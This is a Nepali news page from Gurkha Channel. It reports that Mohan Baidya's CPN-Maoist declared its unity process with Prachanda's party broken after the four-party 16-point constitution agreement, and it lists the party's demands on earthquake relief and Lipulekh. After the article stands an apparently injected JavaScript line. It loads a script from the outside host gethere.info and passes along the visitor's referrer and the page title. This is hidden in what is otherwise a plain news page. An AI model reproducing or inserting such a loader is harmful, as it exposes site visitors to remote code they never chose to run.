बैद्य माओवादी पत्रकार सम्मेलन

admin Avatar

मोहन वैद्य नेतृत्वको नेकपा–माओवादीले संबिधान लेखनका बिषयमा अन्य दलहरुसं सहमति गरेको भन्दै एकीकृत नेकपा माओवादीसंगको एकता प्रक्रिया भंग भएको घोषणा गरेको छ। प्रमुख चार दलबीच संविधानको विवादित विषयमा भएको १६ बुँदे सहमतिप्रति पार्टीको धारणा सार्वजनिक गर्न बुधबार पार्टी केन्द्रीय कार्यालय बुद्धनगरमा आयोजित पत्रकार भेटघाटमा बैद्यले एकीकृत माओवादीका नेतृत्वले बिश्वासघात गरकोे भन्दै पाँच माओवादीको एकता मोर्चाको औचित्य सकिएको समेत जनाएको छ। एकीकृत माओवादी अध्यक्ष प्रचण्डसँग संसदवादी कित्तामा नजाने कुरा मात्र नभई नयाँ जनवादी कार्यदिशामा समेत कुराकानी भएको भन्दै पत्रकार सम्मेलनमा माओवादी अध्यक्ष बैद्यले प्रचण्डले दुई जिब्रे नीति लिएको आरोप पनि लगाउनुभयो। माओवादी अध्यक्ष बैद्यले चार दलको १६ बुँदे सहमतिसँगै पाँच माओवादीको मोर्चा पनि विघटन भएको घोषणा गर्नुभयो।

पत्रकार सम्मेलनमा बैद्यले नयाँ कार्यगत एकता कायम गर्दै १६ बुँदे सहमतिका विरुद्ध संघर्ष गर्ने पार्टीको निर्णय रहेको बताउनुभयो। त्यस्तै नेकपा माओवादीले प्रमुख दलहरुबीच प्रदेश नामाकरण र सीमांकनलाई प्रदेशसभा र आयोग बनाएर टुंगो लगाउने गरी सहमति भइ असार मसान्तभित्र संविधान जारी गर्ने सहमति भइसक्दा पनि वैद्य माओवादीले भने संविधानसभा दुई विघटनमै जोड दिएको छ। भूकम्पपछि राहत पुनर्वास तथा नव निर्माणका कारमलाई पारदर्शी र ब्यवस्थित बनाउन केन्द्रदेखि जिल्ला हुँदै टोलसम्म सर्वदलीय संयन्त्र गठन गरी काम गर्न माग गरिए पनि सरकारले पूर्ण रुपमै उपेक्षा गरेको नेकपा–माओवादीले जनाएको छ। सो पार्टीले लिपुलेकलाई भारत–चीनबीचको ब्यापार विस्तार गर्न प्रयोग गर्ने निर्णय नेपालको भूमिमाथिको खुला अतिक्रमण भएको भन्दै सच्चाउन माग गरेको छ।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search
Cateegories